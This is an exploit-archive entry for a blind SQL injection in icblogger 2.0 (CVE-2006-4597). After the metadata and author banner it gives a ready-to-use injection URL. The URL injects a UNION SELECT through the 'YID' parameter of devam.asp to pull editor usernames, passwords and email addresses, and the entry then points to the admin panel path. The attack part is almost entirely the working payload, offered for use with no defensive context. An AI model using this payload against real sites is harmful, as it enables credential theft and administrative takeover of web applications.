icblogger 2.0 - 'YID' SQL Injection

Author: Chironex Fleckeri
type: webapps
platform: asp
port: 
date_added: 2006-08-31  
date_updated:   
verified: 1  
codes: OSVDB-28432;CVE-2006-4597  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 2287.txt  
################################################################################
##                                                                            ##
##  Icblogger <= "YID" Remote Blind SQL Injection                             ##
##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -       ##
##  Credit by        |  Chironex Fleckeri                                     ##
##  Mail             |  ChironeX.FleckeriX@Gmail.Com                          ##
##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -       ##
##                                                                            ##
################################################################################

##########################################################################################################################################################################
#Usage : http://www.target.com/path/devam.asp?YID=-1 UNION SELECT null,null,null,null,null,editor_adi,null,editor_sifre,editor_mail,null FROM editor WHERE editor_id = 1 #
##########################################################################################################################################################################

#############################################################
#Admin Panel : http://www.target.com/path/admin/default.asp #
#############################################################

# milw0rm.com [2006-09-01]